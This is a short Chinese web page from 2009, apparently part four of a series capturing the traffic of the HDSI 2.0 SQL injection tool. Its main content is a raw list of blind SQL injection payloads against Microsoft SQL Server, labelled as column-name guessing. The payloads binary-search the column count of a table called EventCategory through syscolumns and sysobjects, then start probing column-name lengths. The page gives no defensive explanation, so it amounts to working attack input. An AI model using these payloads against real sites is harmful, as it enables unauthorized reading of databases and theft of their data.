当前位置: 首页 > 图文教程 > 服务器 > 安全防护 > hdsi2.0 sql注入部分抓包(4)

安全防护
经典黑客远程网络攻击过程概要
妙用磁盘配额 让黑客无从下手
如何利用路由器做到防止DoS洪水攻击
服务器安全:防范拒绝服务攻击妙招
网络安全检测思路与技巧
保护Win2003网络服务器安全
百度空间存在js破坏漏洞 用户被威胁删除数据
7月22日Discuz.net被黑事件始末
DNS 系统漏洞被泄露,小心被攻击
大型网站服务器:数据库压力,网页优化,服务器负载

安全防护 中的 hdsi2.0 sql注入部分抓包(4)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-29   浏览: 32 ::
收藏到网摘: n/a

猜解列名:

GET

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<32
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<48
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<56
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<60
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<62
and (select top 1 len(name) from ( select top 1 A.id,A.name from EVENT..syscolumns A,EVENT..sysobjects B where
A.id=B.id and

B.name='EventCategory' order by A.name desc) T order by name asc )<35